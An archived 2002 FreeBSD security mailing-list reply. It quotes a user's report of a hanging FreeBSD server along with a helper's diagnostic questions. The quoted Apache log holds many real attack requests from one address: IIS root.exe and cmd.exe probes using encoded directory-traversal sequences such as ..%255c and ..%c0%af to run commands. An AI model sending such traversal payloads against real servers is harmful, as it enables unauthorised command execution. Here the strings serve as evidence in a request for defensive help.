Date: Sat, 26 Jan 2002 11:20:45 -0600 From: "Chad Bishop" <cbishop@conwaycorp.net> To: <security@freebsd.org> Subject: Re: weird server activity Message-ID: <000c01c1a68d$ca50d860$191a9018@win2ks> References: <F31rfFz82buW5RNB6Hf00001c34@hotmail.com>
next in thread | previous in thread | raw e-mail | index | archive | help
do you have any crontabs? how much ram and cpu clock does this machine have? have you noticed any evidence of an intrusion? ----- Original Message ----- From: "William J. Borskey" <wborskey@hotmail.com> To: <freebsd-security@freebsd.org> Sent: Saturday, January 26, 2002 11:13 AM Subject: weird server activity > I am running FreeBSD 4.4. I use Apache-fp and openssh. About a week ago my > system went down and I wasnt > able to log in or look at any web pages. I could connect, but it woud not > spawn a process to log me in, or serve me a > web document. I got someone to reboot the machine from the console, I was > then able to log into the machine. > Starting processes was slow but top reports normal system loads. Then after > about an hour the machine would no > longer run any processes and quickly shut me out by killing the sshd i was > connected with. I did get a chance to > look at some of my logs, not all unfortuantly. The httpd-access file had > some weird sequences of windows > sounding paths, but it wasnt code red or anything like code red: > 147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET > /scripts/root.exe?/c+dir HTTP/1.0" 404 200 > 147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET > /scripts/root.exe?/c+dir HTTP/1.0" 404 200 "-" "-" > 147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /MSADC/root.exe?/c+dir > HTTP/1.0" 404 200 > 147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /MSADC/root.exe?/c+dir > HTTP/1.0" 404 200 "-" "-" > 147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 > 147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" > 147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 > 147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" > 147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 > 147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" > 147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 200 > 147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 200 "-" "-" > 147.46.54.38 - - [19/Jan/2002:15:13:00 -0600] "GET > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 200 > 147.46.54.38 - - [19/Jan/2002:15:13:00 -0600] "GET > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 200 "-" "-" > 147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy stem32/cmd.exe?/c+dir > HTTP/1.0" 404 200 > 147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy stem32/cmd.exe?/c+dir > HTTP/1.0" 404 200 "-" "-" > 147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 > 147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" > "-" > 147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 > 147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET > "-" > 147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 > 147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" > "-" > 147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 > 147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" > "-" > 147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 > 147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 "-" > "-" > 147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 > 147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 "-" "-" > 147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 > 147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" > "-" > 147.46.54.38 - - [19/Jan/2002:15:13:06 -0600] "GET > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 > 147.46.54.38 - - [19/Jan/2002:15:13:06 -0600] "GET > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-" > i havnt been able to look at any other logs and i doubt that that has > anything to do with it. > > William Borskey > > _________________________________________________________________ > Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?000c01c1a68d$ca50d860$191a9018>